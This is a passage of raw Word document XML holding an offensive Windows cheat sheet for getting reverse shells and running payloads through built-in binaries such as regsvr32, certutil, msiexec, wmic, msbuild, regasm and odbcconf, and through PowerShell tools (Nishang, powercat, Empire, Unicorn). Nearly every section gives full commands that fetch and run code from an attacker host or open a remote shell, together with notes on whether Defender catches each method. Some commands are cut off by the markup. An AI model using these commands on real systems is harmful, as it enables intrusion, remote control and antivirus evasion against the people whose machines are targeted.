    <w:p w14:paraId="34512C8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&lt;script language="JScript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29255DC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&lt;![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CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198C74D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var r = new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ActiveXObject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WScript.Shell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).Run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("calc.exe");    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C11A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]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED5B6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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D8594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&lt;/registration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6EBD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scriptlet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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F25D29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lastRenderedPageBreak/>
        <w:t>Regsvr32 - Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECE7BA" w14:textId="556FBAF7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682B1B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use multi/script/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web_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delivery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4EE9CAC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set target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3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A15C8D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set payload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/reverse/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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30C73DB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set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lhost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10.2.0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698874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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04898B4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#You will be given the command to run in the victim: regsvr32 /s /n /u /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i:http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://10.2.0.5:8080/82j8mC8JBblt.sct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scrobj.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB1D5C7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You can download &amp; execute very easily a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Koadic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 zombie using the stager </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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regsvr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6062EDBC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Certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E473936" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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30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From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D6AA662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Download a B64dll, decode it and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7DC84F" w14:textId="3D8E5DE1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77A35D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certutil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urlcache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-split -f http://webserver/payload.b64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payload.b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64 &amp;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certutil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-decode payload.b64 payload.dll &amp; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile=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LogToConsole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=false /u payload.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667093AE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Download a B64exe, decode it and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE6FDA" w14:textId="3673F7E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B75B86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certutil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urlcache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-split -f http://webserver/payload.b64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payload.b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64 &amp;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certutil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-decode payload.b64 payload.exe &amp; payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E309984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Detected by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defender</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="597E4314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Cscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Wscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BE04648" w14:textId="308AF65B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5F5273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powershell.exe -c "(New-Object System.NET.WebClient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).DownloadFile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('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %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windir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%\system32\cscript.exe \"$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env:temp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\test.vbs\""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EDB0B5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Cscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 - Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A10027" w14:textId="1C776EB3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88F76F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lhost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=10.2.0.5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lport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=4444 -f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vbs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 shell.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D3AE4F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Detected by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defender</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1DD2E41B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PS-Bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85A20C" w14:textId="729F8163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7A66FB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\\webdavserver\folder\batchfile.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371892A7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Process performing network call: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svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload written on disk: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WebDAV client local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cache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="44BEDBF9" w14:textId="17647F4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909A7F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lhost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=10.2.0.5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lport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=4444 &gt; shell.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327E682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impacket-smbserver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-smb2support kali `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pwd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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E98CE" w14:textId="11868EA4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BE8DB3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\\10.8.0.3\kali\shell.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2FD382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Detected by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defender</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="28D1F0FA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MSIExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19167CFE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Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC5CB68" w14:textId="0F4E095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51911E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lhost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=10.2.0.5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lport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=1234 -f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 shell.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD16CF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python -m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SimpleHTTPServer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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E1E97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Victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF85F0C" w14:textId="21BCFF2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C63212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victim&gt;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msiexec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/quiet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\\10.2.0.5\kali\shell.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FCC909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>Detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B94A9E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Wmic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14705BE7" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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31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From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="358271DA" w14:textId="51B33CA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856963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wmic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get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format:"https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://webserver/payload.xsl"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE2DB3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Example </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>xsl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:hyperlink r:id="rId32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from here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC04D1" w14:textId="023DB62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411A92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&lt;?xml version='1.0'?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349243B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&lt;stylesheet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xmlns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="http://www.w3.org/1999/XSL/Transform"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xmlns:ms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urn:schemas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-microsoft-com:xslt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"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xmlns:user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="placeholder" version="1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C661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&lt;output method="text"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A25A3C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&lt;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ms:script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implements-prefix="user" language="JScript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108C2D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&lt;![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CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482778C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    var r = new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ActiveXObject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WScript.Shell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").Run("cmd.exe /c echo IEX(New-Object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Net.WebClient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DownloadString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('http://10.2.0.5/shell.ps1') |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noprofile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-");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D50B5B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    ]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C573F5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&lt;/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ms:script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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A259FA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&lt;/stylesheet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069D813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>Not detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57934304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You can download &amp; execute very easily a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Koadic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 zombie using the stager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wmic</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="477EE2CB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Msbuild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69CF66A0" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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33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From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54A10302" w14:textId="4853EA4B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FD395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/V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"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&amp; !MB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!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noautoresponse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/preprocess \\webdavserver\folder\payload.xml &gt; payload.xml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&amp; !MB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! payload.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708EBC96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You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. As you will be prompted with a PS shell. Just download this and execute it: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34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https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EE5C6D9" w14:textId="5CBC31A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00A2C2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C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe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MSBuildShell.csproj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="614CAC48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>Not detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557A375F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CSC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB22F5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Compile C# code in the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C68FCF9" w14:textId="177CCCBD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2BDD2D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C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /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out:shell.exe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shell.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="074E8203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You can download a basic C# reverse shell from here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId35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https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69DE62E3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Not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deteted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13848857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lastRenderedPageBreak/>
        <w:t>Regasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Regsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E6F3E55" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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36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From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CB71CB7" w14:textId="58BFFB83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7D5908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C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6715F17E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I haven't tried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it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4FDE4AEF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37" w:history="1"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>https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DED9CB3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Odbcconf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FA14BC1" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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38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From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29E404F4" w14:textId="7BDD4599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B9ED65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odbcconf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/s /a {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regsvr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\\webdavserver\folder\payload_dll.txt}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07909475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I haven't tried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it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="509BF45D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39" w:history="1"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>https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09FA85E8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Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEFBAE5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PS-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Nishang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09E1C414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40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https://github.com/samratashok/nishang</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="352BE17F" w14:textId="648251CC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In the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Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder, there are a lot of different shells. To download and execute Invoke-</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>PowerShellTcp.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> make a </w:t>
      </w:r>
      <w:r w:rsidR="004701D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the script and append to the end of the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F76A1BF" w14:textId="7BE92915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52809B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Invoke-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-Reverse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IPAddress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10.2.0.5 -Port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C093F3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Start serving the script in a web server and execute it on the victim's end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA1DDB" w14:textId="59B06132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9E8395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-exec bypass -c "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iwr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'http://10.11.0.134/shell2.ps1')|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iex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</w:p>
    <w:p w14:paraId="2CECB63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Defender doesn't detect it as malicious code (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>yet,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3/04/2019).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10164BBF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TODO: Check other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nishang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42649EFA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PS-Powercat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2933A654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41" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://github.com/besimorhino/powercat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D809F43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Download, start a web server, start the listener, and execute it on the victim's end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A9067" w14:textId="77F64067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53288B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-exec bypass -c "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iwr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'http://10.2.0.5/powercat.ps1')|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iex;powercat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 10.2.0.5 -p 4444 -e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</w:p>
    <w:p w14:paraId="6EB3073A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>Defender doesn't detect it as malicious code (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>yet,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3/04/2019).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652931DB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Other options offered by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786A8D13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Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Generate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads, Serve files...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB30F09" w14:textId="6B2F110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548CE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Serve a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Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AF7D4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-l -p 443 -e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</w:p>
    <w:p w14:paraId="1766A99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Send a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Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885161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 10.1.1.1 -p 443 -e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</w:p>
    <w:p w14:paraId="04AD637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Send a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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACCE64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 10.1.1.1 -p 443 -ep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AA1D4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Send a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UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263252E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 10.1.1.1 -p 443 -ep -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A382F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 Listener to TCP Client Relay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E350A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-l -p 8000 -r tcp:10.1.1.16:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4599451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Generate a reverse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payload which connects back to 10.1.1.15 port 443:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FBA4C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 10.1.1.15 -p 443 -e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-g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDF71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Start A Persistent Server That Serves a File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2DAE3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  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-l -p 443 -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C:\inputfile -rep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26811A92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Empire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E51B6C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42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https://github.com/EmpireProject/Empire</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D59C38C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Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> launcher, save it in a file and download and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF8602" w14:textId="48C4BD6A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3B4E4C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-exec bypass -c "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iwr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'http://10.2.0.5/launcher.ps1')|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iex;powercat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-c 10.2.0.5 -p 4444 -e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</w:p>
    <w:p w14:paraId="3DB8746A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Detected as malicious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code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6856D81A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MSF-Unicorn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AD563A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43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https://github.com/trustedsec/unicorn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22D1E7C8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Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>unicorn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69B5AF08" w14:textId="1C1808A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A08BBC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python unicorn.py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reverse_https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10.2.0.5 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1843B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the created resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E9AFF3" w14:textId="5BD4D5CD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50FBE2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msfconsole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-r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unicorn.rc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27FF36A3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Start a web server serving the </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>powershell_attack.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and execute in the victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DFDBD7" w14:textId="1C3684B9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B018BA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-exec bypass -c "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iwr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'http://10.2.0.5/powershell_attack.txt')|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iex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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2557DA51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Style w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Detected as malicious </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="365F1BEF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More</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BF76BD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hyperlink r:id="rId44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PS&gt;Attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> PS console with some offensive PS modules preloaded (cyphered) </w:t>
      </w:r>
      <w:hyperlink r:id="rId45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https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId46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 xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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WinPWN</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> PS console with some offensive PS modules and proxy detection (IEX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B2579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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151973B1" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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47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https://highon.coffee/blog/reverse-shell-cheat-sheet/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C7813E3" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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48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https://gist.github.com/Arno0x</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="759FA2FC" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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49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https://github.com/GreatSCT/GreatSCT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="083C8E3E" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
